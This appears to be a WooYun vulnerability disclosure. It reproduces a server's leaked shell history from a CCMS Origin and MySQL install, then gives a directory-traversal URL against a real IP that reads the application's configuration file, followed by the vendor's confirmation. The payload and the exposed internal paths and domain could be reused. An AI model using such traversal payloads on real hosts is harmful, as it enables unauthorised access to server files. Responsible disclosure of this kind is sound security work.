cd test
#1426745573
ls -lh
#1426745580
unzip ccms-origin-1.3.4.5-centos-5-Linux-2.6.18-x86_64.zip
#1426745587
ls -lh
#1426745592
cd ccms-origin-1.3.4.5-centos-5-Linux-2.6.18-x86_64
#1426745593
ls -lh
#1426745594
cd bin
#1426745595
ls -lh
#1426745598
ldd ccms_ori 
#1426745638
vi /etc/ld.so.conf
#1426745651
ls -lh
#1426745681
ls -lh /usr/local/mysql/lib/mysql/libmysqlclient.so.16
#1426745737
vi /etc/profile
#1426745748
vi /etc/ld.so.conf
#1426745752
ls -lh
#1426745769
cd /etc/ld.so.conf.d/mysql-x86_64.conf
#1426745772
vi /etc/ld.so.conf.d/mysql-x86_64.conf
#1426745801
ls -lh
#1426745814
cd /etc/ld.so.conf.d
#1426745815
ls -lh
#1426745822
cat mysql-i386.conf
#1426745831
rm -rf mysql-i386.conf mysql-x86_64.conf
#1426745834
cd ..
#1426745836
ldconfig
#1426745838
ldconfig
#1426745840
ls -lh
#1426745852
cd /usr/local/ccms/origin/bin/
#1426745853
ls -lh
#1426745857
ldd ccms_ori 
#1426748136
cd /etc/ld.so.conf
#1426748142
cd /etc/ld.so.conf.d
#1426748143
ls -lh
#1426748152
rm -rf kernelcap-2.6.18-308.el5.conf
#1426748153
ls -lh
#1426748167
vi /etc/ld.so.conf
#1426748182
vi /etc/profile
#1426748638
ps -ef|grep mysql
#1426750150
ps -ef|grep mysql
#1426750156
exit
#1426746259
ldconfig
#1426746289
vi /etc/ld.so.conf.d/kernelcap-2.6.18-308.el5.conf
#1426746300
cd /etc/ld.so/conf.d
#1426746311
cd /etc/ld.so.conf.d/
#1426746312
ls -lh
#1426746334
cat kernelcap-2.6.18-308.el5.conf
#1426746342
grep "hwcap" *
#1426746355
ls -lh
#1426746372
mv kernelcap-2.6.18-308.el5.conf kernelcap-2.6.18-308.el5.conf.bak
#1426746374
cd ..
#1426746375
ls -lh
#1426746386
cat ld.so.conf
#1426746394
ldconfig
#1426746402
ls -lh
#1426746413
cd /usr/local/ccms/origin
#1426746414
ls -lh
#1426746415
cd bin
#1426746416
ls lh
#1426746417
ls -lh
#1426746422
ldd ccms_ori 
#1426746434
./ccms_ori -v
#1426746650
cd
#1426746651
ls -lh
#1426746656
cd ccms-origin-1.3.4.5-centos-5-Linux-2.6.18-x86_64
#1426746657
ls -lh
#1426746664
vi mysql_install_manual.sh 
#1426746770
vi origin_install_manual.sh 
#1426746788
vi mysql_install_manual.sh 
#1426746864
cd /etc/ld.so.conf.d/
#1426746866
ls -l
#1426746877
cp kernelcap-2.6.18-308.el5.conf.bak kernelcap-2.6.18-308.el5.conf
#1426746883
ldconfig
#1426746890
cd ..
#1426746891
ls -lh
#1426746893
cd 
#1426746896
ls -lh
#1426746903
rm -rf /usr/local/mysql/
#1426746909
cd ccms-origin-1.3.1.2-centos-5-Linux-2.6.18-x86_64
#1426746911
ls -lh
#1426746920
cd ..
#1426746921
ls -lh
#1426746927
cd ccms-origin-1.3.1.5-centos-5-Linux-2.6.18-x86_64
#1426746929
ls -lh
#1426746932
cd ..
#1426746934
ls -lh
#1426746940
cd ccms-origin-1.3.4.5-centos-5-Linux-2.6.18-x86_64
#1426746941
ls -lh
#1426746947
vi mysql_install_manual.sh 
#1426746958
vi mysql_install_manual.sh 
#1426746969
./mysql_install_manual.sh 
#1426746980
vi mysql_install_manual.sh 
#1426747002
vi mysql_install_manual.sh 
#1426747447
ls -lh /etc/ld.so.conf.d/
#1426747474
ls -lh /etc/ld.so.conf.d/
#1426747618
vi mysql_install_manual.sh 
#1426747683
grep "aaaa" mysql_install_manual.sh
#1426747688
echo $?
#1426747698
grep "mysql" mysql_install_manual.sh
#1426747703
echo $?
#1426747707
vi mysql_install_manual.sh 
#1426748214
ps -ef|grep mysql
#1426748221
rm -rf /usr/local/mysql/
#1426748223
ls -lh
#1426748226
./mysql_install_manual.sh 
#1426748236
vi mysql_install_manual.sh 
#1426748258
./mysql_install_manual.sh 
#1426748308
vi mysql_install_manual.sh 
#1426748343
ps -ef|grep mysql
#1426748355
kill -9 25553 25845
#1426748360
ps -ef|grep ccms
#1426748370
vi /etc/ld.so.conf
#1426748376
vi /etc/profile
#1426748388
rm -rf /usr/local/mysql/
#1426748394
./mysql_install_manual.sh 
#1426748665
vi mysql_install_manual.sh 
#1426748753
ps -ef|grep mysql
#1426748762
kill -9 26361 26648
#1426748765
./mysql_install_manual.sh 
#1426748772
rm -rf /usr/local/mysql/
#1426748774
./mysql_install_manual.sh 
#1426748808
vi ./mysql_install_manual.sh 
#1426748815
ps -ef|grep mysql
#1426748822
mysql -u root -p
#1426748835
vi mysql_install_manual.sh 
#1426748897
ps -ef|grep mysql
#1426748903
kill -9 28489 28891
#1426748905
ls -lh
#1426748915
rm -rf /usr/local/mysql/
#1426748922
./mysql_install_manual.sh 
#1426748945
vi mysql_install_manual.sh 
#1426748957
ps -ef|grep mysql
#1426748960
/usr/local/mysql/bin/mysql_install_db --user=mysql
#1426749062
ls /usr/local/mysql/libexec/
#1426749122
ls /usr/local/mysql
#1426749126
ls /usr/local/mysql/bin/
#1426749141
vi mysql_install_manual.sh 
#1426749232
ps -ef|grep mysql
#1426749240
rm -rf /usr/local/mysql/
#1426749247
./mysql_install_manual.sh 
#1426749273
ps -ef|grep mysql
#1426749281
mysql -u root -p
#1426749299
ls -lh
#1426749348
nc -l 9999 <  mysql_install_manual.sh 
#1426749352
ifconfig|less
#1426749357
nc -l 9999 <  mysql_install_manual.sh 
#1426755958
netstat -lntp
#1426755962
cd /usr/local/ccms
#1426755963
ls
#1426755965
cd origin
#1426755966
ls
#1426755967
cd logs/
#1426755968
ls
#1426755969
ll
#1426755979
/etc/init.d/ccms-origin version
#1426756068
/etc/init.d/ccms-origin version
#1426756071
netstat -lntp
#1426756078
vim /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426756160
vim /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426756214
vim /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426756678
ls
#1426756681
vim /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426756694
/etc/init.d/ccms-origin restart
#1426756698
netstat -lntp
#1426756706
ls
#1426756708
ll
#1426756710
ll
#1426756711
ll
#1426756713
ll
#1426756716
cd ..
#1426756717
ls
#1426756723
cd ..
#1426756724
ls
#1426756730
ll
#1426756737
cd /usr/local/ccms/origin.1426738504
#1426756738
ls
#1426756741
cd logs/
#1426756741
ls
#1426756745
cd ..
#1426756746
ls
#1426756748
cd etc/
#1426756748
ls
#1426756754
vim ccms_origin.conf
#1426756792
cp ccms_origin.conf   /usr/local/ccms/origin/etc/
#1426756799
/etc/init.d/ccms-origin restart
#1426756804
netstat -lntp
#1426756846
cd /usr/local/ccms/origin
#1426756847
ls
#1426756848
cd logs/
#1426756848
ls
#1426756851
ll
#1426756855
ll
#1426756856
ll
#1426756856
ll
#1426756857
ll
#1426756857
ll
#1426756858
ll
#1426756858
ll
#1426756859
ll
#1426756859
ll
#1426756859
ll
#1426756860
ll
#1426756860
ll
#1426756860
ll
#1426757053
ifconfig
#1426757103
ls
#1426757109
vim /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426757123
cd /data/cache1
#1426757123
ls
#1426757129
cd t.59find.com/
#1426757129
ls
#1426757131
cd live/
#1426757131
ls
#1426757145
cd 14267499180307t
#1426757145
ls
#1426757150
cd
#1426757155
netstat -lntp
#1426821693
netstat -lntp
#1426821763
ls
#1426821767
cd /usr/local/ccms/origin
#1426821767
ls
#1426821768
cd logs/
#1426821769
ls
#1426821769
ll
#1426821774
vim  20150319172000-Orginlog.log
#1426821849
vim /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426821859
cd /data/cache1
#1426821859
ls
#1426821861
cd t.59find.com/
#1426821861
ls
#1426821863
cd live/
#1426821864
ls
#1426821881
cd 14268200580307t
#1426821881
ls
#1426821884
cat index.m3u8
#1426821910
ls
#1426821920
vim  /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426821932
/etc/init.d/ccms-origin restart
#1426821937
vim  /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426821983
ls
#1426821986
ls
#1426821987
ls
#1426822074
cd ..
#1426822075
ls
#1426822077
cd 14268220420307t
#1426822078
ls
#1426822113
ifconfig
#1426822143
ls
#1426822155
netstat -lntp
#1426822161
vim /usr/local/nginx/conf/nginx.conf
#1426822207
vim  /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426822218
/etc/init.d/nginx.sh stop
#1426822223
/etc/init.d/ccms-origin restart
#1426822569
ls
#1426822729
cd ..
#1426822730
ls
#1426822733
cd 14268226720307t
#1426822734
ls
#1426822994
ls
#1426822997
cat index.m3u8
#1426823000
cat index.m3u8
#1426823001
cat index.m3u8
#1426823001
cat index.m3u8
#1426823002
cat index.m3u8
#1426823966
cd ..
#1426823967
ls
#1426823969
cd  14268237970307t
#1426823970
]ls
#1426823971
ls
#1426823972
ls
#1426823974
cat index.m3u8
#1426824081
cd
#1426824082
ls
#1426824645
cd /usr/local/
#1426824646
ls
#1426824647
cd ccms
#1426824647
ls
#1426824649
cd origin
#1426824649
ls
#1426824650
cd logs/
#1426824651
ls
#1426824651
ll
#1426824659
vim  20150320113023-Orginlog.log
#1426824872
vim /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426824888
/etc/init.d/ccms-origin restart
#1426824926
vim /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426825122
vim /usr/local/ccms/origin/etc/ccms_origin.conf 
#1426825151
/etc/init.d/ccms-origin restart
#1427342055
netstat -lntp
#1427342062
vim /usr/local/ccms/origin/etc/ccms_origin.conf 
#1427342163
ifconfig
#1427342202
vim /usr/local/ccms/origin/etc/ccms_origin.conf 
#1427342219
/etc/init.d/ccms-origin reload
#1429093672
netstat -lntp


各种配置文件日志等路径都有了,就不证明了

漏洞证明:

http://42.62.25.196/../../../../../../../../../../../../../../../../../usr/local/ccms/origin/etc/ccms_origin.conf

修复方案:

修改配置

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-27 14:20

厂商回复:

非常感谢,我们会尽快处理。

最新状态:

暂无